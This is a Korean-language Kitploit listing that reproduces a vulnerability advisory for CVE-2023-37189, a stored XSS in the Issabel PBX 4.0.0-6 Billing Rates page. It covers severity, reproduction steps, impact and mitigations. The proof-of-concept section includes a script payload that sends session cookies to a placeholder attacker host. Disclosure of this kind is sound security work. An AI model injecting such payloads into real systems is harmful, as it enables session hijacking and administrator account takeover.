Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-37189 — 저장형 크로스 사이트 스크립팅(Stored XSS) 취약점이 Issabel PBX 버전 4.0.0-6의 Billing Rates 관리 페이지(index.php?menu=billing_rates)에 존재합니다. | Kitploit
도구/GitHubGitHub/sahiloj/cve-2023-37189
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingLearning & Education
GitHubsahiloj/cve-2023-37189

CVE-2023-37189

저장형 크로스 사이트 스크립팅(Stored XSS) 취약점이 Issabel PBX 버전 4.0.0-6의 Billing Rates 관리 페이지(index.php?menu=billing_rates)에 존재합니다.

저장소 보기
1116개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-37189 — Issabel PBX 4.0.0-6 저장형 교차 사이트 스크립팅 (XSS)

CVE Severity Type Vendor


개요

필드세부 정보
CVE IDCVE-2023-37189
취약점저장형 교차 사이트 스크립팅 (XSS)
영향받는 제품Issabel PBX 4.0.0-6
영향받는 URLindex.php?menu=billing_rates
취약한 필드새 요금 만들기 모듈의 Name 및 Prefix 필드
심각도Medium (CVSS 3.1 Base Score: 6.1 — AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)
보고일2023년 7월 7일
발견자Sahil Ojha
테스트 환경Windows
공급업체 홈페이지https://www.issabel.org/
소프트웨어 출처https://github.com/IssabelFoundation/issabelPBX

설명

Issabel PBX 버전 4.0.0-6의 요금 관리 페이지(index.php?menu=billing_rates)에서 저장형 교차 사이트 스크립팅 (XSS) 취약점이 존재합니다.

Issabel PBX는 FreePBX/Asterisk 기반으로 구축된 널리 사용되는 오픈 소스 통합 커뮤니케이션 플랫폼입니다. 요금 → 요금 기능을 통해 관리자는 사용자 정의 Name 및 Prefix로 통화 요금 항목을 정의할 수 있습니다. 입력 검증 및 출력 인코딩이 충분하지 않아 인증된 공격자가 두 필드에 임의의 HTML 또는 JavaScript를 주입할 수 있습니다. 악성 스크립트는 애플리케이션 데이터베이스에 영구적으로 저장되며, 이후 요금 페이지를 방문하는 모든 사용자(다른 관리자 포함)의 브라우저에서 자동으로 실행됩니다. 추가적인 상호작용은 필요하지 않습니다.

이러한 유형의 취약점은 관리 패널에서 특히 위험합니다:

  • 다른 관리자의 세션 쿠키를 탈취하여 전체 계정 탈취로 이어질 수 있습니다.
  • 피해자에게 제공되는 페이지의 모양을 수정하여 피싱 공격을 가능하게 합니다.
  • CSRF 토큰 탈취, 키로깅, 또는 악성 사이트로의 리다이렉션을 용이하게 할 수 있습니다.
  • 페이로드는 명시적으로 제거될 때까지 지속되므로 시간이 지남에 따라 무제한의 피해자에게 영향을 미칠 수 있습니다.

취약점 세부 정보

  • 취약점 클래스: 저장형 (영구적) 교차 사이트 스크립팅 (CWE-79)
  • 공격 벡터: 네트워크
  • 인증 필요: 예 (낮은 권한의 인증된 사용자 또는 관리자 계정)
  • 사용자 상호작용: 필요 (피해자가 요금 페이지를 방문해야 함)
  • 범위: 변경됨 (공격자가 다른 사용자의 브라우저 세션에 영향을 줄 수 있음)
  • 근본 원인: 저장된 값을 페이지에 렌더링할 때 Name 및 Prefix 필드에 대한 HTML 인코딩/출력 검증 누락

개념 증명

다음 페이로드를 새 요금 만들기 양식의 Name 또는 Prefix 필드에 입력하면 취약점을 입증할 수 있습니다:

기본 경고 (기능 확인):

root@kitploit:~
<script>alert('XSS')</script>

세션 쿠키 탈취 (실제 사용자나 시스템을 대상으로 하지 마십시오. attacker.example.com을 사용이 허가된 소유 서버로 바꾸십시오):

root@kitploit:~
<script>document.location='https://attacker.example.com/steal?c='+document.cookie</script>

이미지 기반 onerror 페이로드 (WAF 우회):

root@kitploit:~

⚠️ 참고: 이 페이로드는 교육 및 보안 연구 목적으로만 제공됩니다. 소유하지 않은 시스템에서 테스트하기 전에 항상 적절한 서면 허가를 받으십시오.


재현 단계

  1. 관리자 계정으로 Issabel PBX 웹 인터페이스에 로그인합니다.

  2. Reports → Billing → Rates로 이동합니다. (URL: index.php?menu=billing_rates)

  3. "Create New Rate" 를 클릭하고 Prefix 또는 Name 필드에 제작된 XSS 페이로드를 입력합니다.

    Step 2 – Name/Prefix 필드에 페이로드 주입

  4. Save를 클릭합니다. 페이로드가 데이터베이스에 저장됩니다.

  5. 요금 페이지를 방문하는 모든 사용자(다른 관리자 포함)의 브라우저에서 스크립트가 자동으로 실행됩니다.

    Step 3 – 페이지 로드 시 페이로드 실행

    Step 3 – 세션 쿠키 캡처


영향

  • 세션 하이재킹: 공격자는 세션 쿠키를 탈취하여 다른 사용자나 관리자를 가장할 수 있습니다.
  • 권한 상승: 관리자 세션을 하이재킹하여 낮은 권한의 공격자가 전체 관리 제어권을 얻을 수 있습니다.
  • 데이터 유출: 페이지에 표시된 민감 정보를 조용히 유출할 수 있습니다.
  • 영구적 백도어: 페이로드는 수동으로 제거될 때까지 활성 상태로 남아 있어 지속적인 위협이 됩니다.

완화 / 해결 방법

공급업체 및 시스템 관리자는 다음 대책을 적용하는 것이 좋습니다:

  1. 출력 인코딩: 저장된 값을 HTML 페이지에 렌더링할 때 컨텍스트에 맞는 HTML 인코딩을 적용합니다 (예: PHP에서 ENT_QUOTES 플래그와 함께 htmlspecialchars() 사용). 이는 XSS에 대한 가장 신뢰할 수 있는 1차 방어입니다.
  2. 입력 검증: 2차 심층 방어 수단으로 서버 측에서 사용자 제공 입력을 거부하거나 정화합니다. 데이터를 저장하기 전에 HTML 특수 문자(<, >, ", ', &)를 제거하거나 인코딩합니다. 입력 검증만으로는 우회가 가능하므로 유일한 통제 수단으로 의존해서는 안 됩니다.
  3. 콘텐츠 보안 정책 (CSP): 엄격한 Content-Security-Policy HTTP 헤더를 배포하여 인라인 스크립트 실행을 제한합니다.
  4. 웹 애플리케이션 방화벽 (WAF): XSS 탐지 규칙이 있는 WAF를 심층 방어 수단으로 사용합니다.
  5. 정기적인 보안 감사: 모든 사용자 제어 입력 필드에 대해 주기적인 코드 검토 및 침투 테스트를 수행합니다.

참고 자료

  • NVD – CVE-2023-37189
  • MITRE CVE – CVE-2023-37189
  • OWASP: 교차 사이트 스크립팅 (XSS)
  • CWE-79: 웹 페이지 생성 시 입력의 부적절한 중성화
  • Issabel PBX – 공식 웹사이트
  • IssabelFoundation/issabelPBX – GitHub

면책 조항

이 저장소와 여기에 포함된 정보는 교육 및 보안 연구 목적으로만 제공됩니다. 저자는 제공된 정보의 오용이나 손해에 대해 책임을 지지 않습니다. 보안 테스트를 수행하기 전에 항상 시스템 소유자로부터 명시적인 서면 허가를 받으십시오.


발견 및 보고자: Sahil Ojha

도구 다운로드